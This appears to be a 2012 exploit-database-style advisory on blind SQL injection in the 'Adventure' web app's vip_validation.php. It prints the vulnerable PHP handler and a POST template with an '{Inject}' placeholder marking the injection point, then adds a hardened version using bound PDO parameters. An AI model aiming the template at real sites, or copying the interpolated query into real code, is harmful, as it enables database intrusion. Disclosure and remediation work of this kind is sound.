
Adventure - Blind SQL Injection

Author: The UnKnØwN, Published: 21-09-2012
+-----------------------------------------------------------------------------+
¦ Adventure - Blind SQL Injection ¦ _ ¦ - ¦ x ¦
+-----------------------------------------------------------------------------+
¦ ______ ______ _______ _______ _ _ ¦
¦ (_____ \(_____ (_______) (_______) | | (_) _ ¦
¦ _____) )_____) ) ___ _____ _ _ ____ | | ___ _ _| |_ ¦
¦ | __ /| ____/ | (_ | | ___) ( \ / ) _ \| |/ _ \| (_ _) ¦
¦ | | \ \| | | |___) | | |_____ ) x (| |_| | | |_| | | | |_ ¦
¦ |_| |_|_| \_____/ |_______|_/ \_) __/ \_)___/|_| \__) ¦
+-----------------------------------------------------------------------------+
¦ by The UnKnØwN ¦
+-----------------------------------------------------------------------------+
¦ greets to : KiMgX12 - Fawzi Coldfire - BenzØ - Soka - Hony - Pincki - ¦
¦ Linkce16 - Mooh Splinter - The Spark - F3i ¦
¦ The Crazy3D Team AND all algerian H4x0r$ ¦
+-----------------------------------------------------------------------------+
¦ [+] exploit title : Adventure - Blind SQL Injection ¦
¦ [+] date : 05-07-2012 ¦
¦ [+] author : The UnKnØwN ¦
¦ [+] software link :http://www.mediafire.com/?ui176j05x53ydq3 ¦
¦ [+] version : 1 ¦
¦ [+] category : webapps ¦
¦ [+] tested on : windows xp ¦
+-----------------------------------------------------------------------------+
¦ Vulnerability Details ¦
+-----------------------------------------------------------------------------+
¦ Unprotected POST variable in "/vip_validation.php" ¦


<?php
// Vulnerable handler from /vip_validation.php, as published in the advisory.
if (isset($_POST['send_vip']) && $_POST['send_vip'] == 'Valider')
{
    // Session id spliced into the SQL text (comes from the server-side session, not straight from the client).
    $req = $db_accounts->prepare("SELECT * FROM accounts WHERE guid='".$_SESSION['id']."' ");
    $req->execute();
    $id = $_SESSION['id'];
    foreach($req as $data)
    {
        $guid_account = $data['guid'];
        $recupPts = $data['points'];
    }
    // Attacker-controlled POST value interpolated directly into the query string.
    // prepare() gives no protection here: the value is part of the SQL text, not a bound parameter.
    $personnage = $_POST['perso'];
    $reqp = $db_accounts->prepare("SELECT * FROM personnages WHERE guid='$personnage'");
    $reqp->execute();
    // ... remainder of the handler not included in the advisory
}




URL : http://site/path/vip_validation.php
POST DATA : send_vip=Valider&perso={Inject}
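The following is an added example, not code from the advisory or from the Adventure project: it shows the same handler rewritten so that `perso` reaches the database only as a bound parameter. It assumes `$db_accounts` is a PDO connection (the page's `prepare()`/`execute()` calls and iteration over the statement are consistent with PDO but the advisory does not say so) and keeps the page's own table and column names.

```php
<?php
// Added example: hardened version of the /vip_validation.php handler.
// Assumption (not stated in the advisory): $db_accounts is a PDO instance.

if (isset($_POST['send_vip']) && $_POST['send_vip'] === 'Valider') {
    $id = $_SESSION['id'];

    // Account lookup: bind the session id instead of splicing it into the SQL string.
    $req = $db_accounts->prepare('SELECT guid, points FROM accounts WHERE guid = :guid');
    $req->bindValue(':guid', $id);
    $req->execute();
    $account = $req->fetch(PDO::FETCH_ASSOC);
    if ($account === false) {
        exit('Unknown account');
    }
    $guid_account = $account['guid'];
    $recupPts     = $account['points'];

    // Character lookup: the client-supplied value is passed as a bound parameter,
    // so it can only ever be compared against guid, never change the query structure.
    $personnage = $_POST['perso'] ?? '';
    $reqp = $db_accounts->prepare('SELECT * FROM personnages WHERE guid = :perso');
    $reqp->bindValue(':perso', $personnage);
    $reqp->execute();
    $perso = $reqp->fetch(PDO::FETCH_ASSOC);
    if ($perso === false) {
        exit('Unknown character');
    }

    // ... remainder of the VIP validation logic
}
```

The point worth taking from the original code is that calling `prepare()` is not what prevents injection; binding is. A string built with `"...guid='$personnage'"` is already a complete SQL statement by the time `prepare()` sees it. If the `guid` column is numeric, checking the input with `filter_var($personnage, FILTER_VALIDATE_INT)` before the query is a cheap additional control, and setting `PDO::ATTR_EMULATE_PREPARES` to `false` on the connection ensures the parameters are sent to the server separately from the statement text.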



¦ ¦
+-----------------------------------------------------------------------------+
¦ End ¦
+-----------------------------------------------------------------------------+
